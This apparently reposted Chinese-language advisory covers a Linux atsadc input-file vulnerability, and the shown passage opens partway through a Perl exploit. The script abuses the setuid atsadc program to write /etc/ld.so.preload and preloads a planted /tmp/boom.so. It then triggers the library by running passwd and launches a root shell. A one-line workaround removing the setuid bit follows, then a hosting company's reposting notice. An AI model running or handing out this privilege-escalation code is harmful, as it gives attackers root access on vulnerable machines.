Linux atsadc 输入文件检查漏洞

　　execve(a[0], a, 0);

　　return 0;

　　}

　　_EOF2_

　　close O;

　　print "Compile shell ...n";

　　$foo = `cc /tmp/boomsh.c -o /tmp/boomsh`;

　　umask 0;

　　print "Invoking vulnerable program (atsadc)...n";

　　$foo = `atsadc 2 1 /etc/ld.so.preload`;

　　open O, ">/etc/ld.so.preload" or die "Huh? Can''t open preload.";

　　print O "/tmp/boom.so";

　　close O;

　　$foo = `/usr/bin/passwd`;

　　# let it look like if we have sth. to do. :)

　　sleep 3;

　　print "Welcome. But as always: BEHAVE!n";

　　system("/tmp/boomsh");

　　建议：

　　临时解决办法： chmod u-s atsadc

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务，公司网站：http://www.lingzhong.cn 为了给广大客户了解更多的技术信息，本技术文章收集来源于网络,凌众科技尊重文章作者的版权，如果有涉及你的版权有必要删除你的文章，请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!